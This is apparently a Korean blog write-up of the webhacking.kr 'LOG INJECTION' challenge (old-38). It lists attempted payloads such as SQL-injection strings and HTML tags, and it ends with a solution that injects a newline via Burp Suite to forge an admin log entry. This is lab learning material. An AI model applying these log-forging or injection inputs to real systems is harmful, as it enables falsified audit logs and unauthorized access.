webhacking.kr old-38

log injection이라는 타이틀과 함께 빈칸하나와 login버튼이 있다.

<html>

<head>

<title>Challenge 38</title>

</head>

<body>

<h1>LOG INJECTION</h1>

<form method=post action=index.php>

<input type=text name=id size=20>

<input type=submit value='Login'>

</form>

<!-- <a href=admin.php>admin page</a> -->

</body>

</html>

소스를 보니 주석으로 admin.php로 이동하면 먼가 알수 있을거같다.

admin으로 접속하라는 문구와 함께 로그들이 보여진다.

해보았다.

123.123.123.123:'or 1=1#

123.123.123.123:123.123.123.123:'or 1=1#

123.123.123.123:admin#

123.123.123.123:' or id=admin#

123.123.123.123:123),('123','admin'

123.123.123.123:123

123.123.123.123:chr(11)

123.123.123.123:123admin

123.123.123.123:123.123.123.123:admin

123.123.123.123::admin

123.123.123.123:%09admin

123.123.123.123:\admin

123.123.123.123:abd 123.123.123.123:admin

123.123.123.123:abd 123.123.123.123:admin

123.123.123.123:abd 123.123.123.123:admin

123.123.123.123:abd <br>123.123.123.123:admin

123.123.123.123:abd"<br> 123.123.123.123:admin

123.123.123.123:abd"<br> "123.123.123.123:admin

1

admin만이 막혀있었고 다른 문자들은 모두 허용되었다. 

이건 머 html코드 까지 넣어 시도해보았다.

결국 다음줄로 넘겨야 할텐데 burp suit를 이용해 줄바꿈을 넣어서 해보았다.

id=123

123.123.123.123:admin으로 넣어서 보내 주었더니 성공!

입력창을 textarea로 바꿔서 줄바꿈을 넣어도 될거같다.

<textarea type="text" name="id" size="20"></textarea> 이런식으로